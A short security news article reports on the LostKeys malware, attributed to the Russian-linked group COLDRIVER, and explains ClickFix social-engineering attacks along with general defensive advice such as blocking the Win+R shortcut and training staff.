Cyber Espionage has always been a looming threat over users with increased dependence and interaction with digital resources. A new Malware dubbed the Lost keys has further increased the perils of using the internet. As per Google a Russian state backed Malware crew known as COLDRIVER has been continually using Lost Keys since the start of the year to spy on Western Governments, Journalists and Non-governmental organizations.
It was Google’s threat intelligence group that reported the Lost Keys Malware in January. As per the reports COLDRIVER has been deploying the Malware in a very targeted Click Fix Attacks. Click fix attacks operate by prompting the users to copy and run scripts to download Malware. Once these scripts run in your computer they pave the way for Malware to be downloaded onto your device.
The main goal behind getting the users to run the script is to get them to download Malware which Google has identified as Visual Basic Script. COLDRIVER usually steals Login details to further pilfer Emails and contacts. Beyond the Lost Keys, they often deploy another Malware known as the SPICA they grabs documents and files.
Operating Since 2017
COLDRIVER the originators of Lost keys, have been Carrying such attacks since 2017. Their targets have overtime ranged from Defense and Government organizations, NGO’s and Politicians. The attacks have increased after Russia’s invasion of Ukraine and expanding to defense industrial sites.
The U.S. state has already sanctioned a couple of COLDRIVER operatives , U.S. government is right now offering a $10 million reward for any tips that could help trackdown other members.
Click Fix Attacks and How To Save Yourself
The click Fix technique is often used by hackers to persuade a user to execute a Malicious command on their computer. The command is often masqueraded as a fix for an issue they might be facing. These attacks rely on social engineering techniques, usually under such attacks the attacker would ask the user to copy a long command line , paste it into the systems Run window and press Enter- This compromises the computer and often leads to full-blown Malware attack.
Often such attacks are hidden under the pretense of scenarios such as unable to display a page, need to refresh the browser, error loading a document on the website, error loading a document from email, Problems with the Microphone and Camera in Google Meet or Zoom and many other scenarios that are readily possible in everyday use.
How To Protect yourself From Such Attacks
One of the easiest ways, to protect yourself from such attacks would be to block the use [WIN] + [R] key combination. This combination is rarely used in day to day work. Beyond this a protection can be installed at the mail gateway level along with special training for the employee’s awareness of cyber threats ,including new tactics and specialized training to deal with such scenarios.